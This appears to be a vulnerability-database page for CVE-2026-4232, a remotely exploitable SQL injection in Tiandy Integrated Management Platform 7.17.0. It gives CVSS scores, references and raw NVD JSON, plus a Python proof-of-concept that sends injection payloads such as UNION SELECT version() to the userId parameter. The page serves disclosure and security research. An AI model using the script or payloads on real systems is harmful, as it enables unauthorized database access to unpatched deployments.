CVE-2026-4232

Description

A vulnerability was determined in Tiandy Integrated Management Platform 7.17.0. Affected by this issue is some unknown functionality of the file /rest/user/getAuthorityByUserId. Executing a manipulation of the argument userId can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Tiandy Integrated Management Platform 7.17.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4232 PoC - Tiandy IMP SQL Injection
# Target: /rest/user/getAuthorityByUserId

def exploit(target_url, user_id_payload):
    """
    Exploit SQL injection in Tiandy IMP getAuthorityByUserId endpoint
    """
    endpoint = f"{target_url}/rest/user/getAuthorityByUserId"
    params = {"userId": user_id_payload}
    
    print(f"[*] Target: {endpoint}")
    print(f"[*] Payload: {user_id_payload}")
    
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        if response.status_code == 200:
            print("[+] Request successful - potential SQL injection")
            print(f"[+] Response preview: {response.text[:500]}")
        
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-4232.py <target_url>")
        print("Example: python cve-2026-4232.py http://192.168.1.100:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Basic SQL injection test payloads
    payloads = [
        "1",
        "1' OR '1'='1",
        "1' UNION SELECT NULL--",
        "1' UNION SELECT version()--",
        "1' AND 1=1--"
    ]
    
    for payload in payloads:
        print("\n" + "="*50)
        exploit(target, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4232
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4232
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4232/
[4] VulDB https://vuldb.com/cve/CVE-2026-4232
[5] https://my.feishu.cn/docx/UxbzdoU7coxKGjxbJ7ycPor3n3Q?from=from_copylink
[6] https://vuldb.com/?ctiid.351155
[7] https://vuldb.com/?id.351155
[8] https://vuldb.com/?submit.771216

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4232", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:17.000", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tiandy Integrated Management Platform 7.17.0. Affected by this issue is some unknown functionality of the file /rest/user/getAuthorityByUserId. Executing a manipulation of the argument userId can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Tiandy Integrated Management Platform 7.17.0. Afectada por este problema es alguna funcionalidad desconocida del archivo /rest/user/getAuthorityByUserId. La ejecución de una manipulación del argumento userId puede llevar a una inyección SQL. El ataque puede lanzarse remotamente. El exploit ha sido divulgado públicamente y puede utilizarse. Se contactó tempranamente al proveedor sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://my.feishu.cn/docx/UxbzdoU7coxKGjxbJ7ycPor3n3Q?from=from_copylink", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351155", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351155", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771216", "source": "[email protected]"}]}}